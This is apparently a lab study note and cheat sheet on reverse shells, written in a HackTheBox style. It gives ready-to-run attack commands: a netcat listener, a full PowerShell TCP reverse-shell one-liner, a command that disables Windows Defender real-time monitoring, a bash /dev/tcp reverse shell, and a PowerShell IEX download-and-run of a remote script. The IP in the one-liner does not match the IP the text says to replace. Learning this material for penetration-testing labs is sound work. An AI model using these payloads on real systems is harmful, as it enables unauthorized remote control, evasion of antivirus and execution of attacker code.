Reverse Shell

---

Reverse Shell (Cheat Sheet)

PayloadsAllTheThings/Methodology and Resources/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

🔁 Reverse Shells – Flipping the Flow

🧠 What is a Reverse Shell?

In a reverse shell, the target (victim) initiates the connection back to your attacker (listener) machine.

📍 Attacker = Server 📍 Target = Client

---

🧪 Hands-On: Reverse Shell with PowerShell on Windows

---

🖥️ Step 1: Start Listener on Attacker

sudo nc -lvnp 443

Using port 443 (HTTPS) improves chances of getting through firewalls undetected.

---

🪟 Step 2: PowerShell One-Liner on Windows Target

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.15.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

📌 Make sure to replace '10.10.14.158' with your attacker IP address.

---

⚠️ Common Blocker: Antivirus!

💣 If Windows Defender is enabled, you may see:

This script contains malicious content and has been blocked...

---

🛡️ Disable Defender Realtime Protection (For Lab Use Only!)

Set-MpPreference -DisableRealtimeMonitoring $true

➡️ Run in an Admin PowerShell Console

---

✅ Step 3: Success! Back on the Attacker…

Connection received on 10.129.36.68 49674

And on your shell prompt:

PS C:\Users\htb-student> whoami
ws01\htb-student

🎉 Boom — you now have remote access to the Windows box!

---

📚 Bonus: Reverse Shell Cheat Snippets

🐧 Bash (Linux target)

bash -i >& /dev/tcp/10.10.14.158/443 0>&1

---

🪟 PowerShell (Alternate)

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.158/shell.ps1')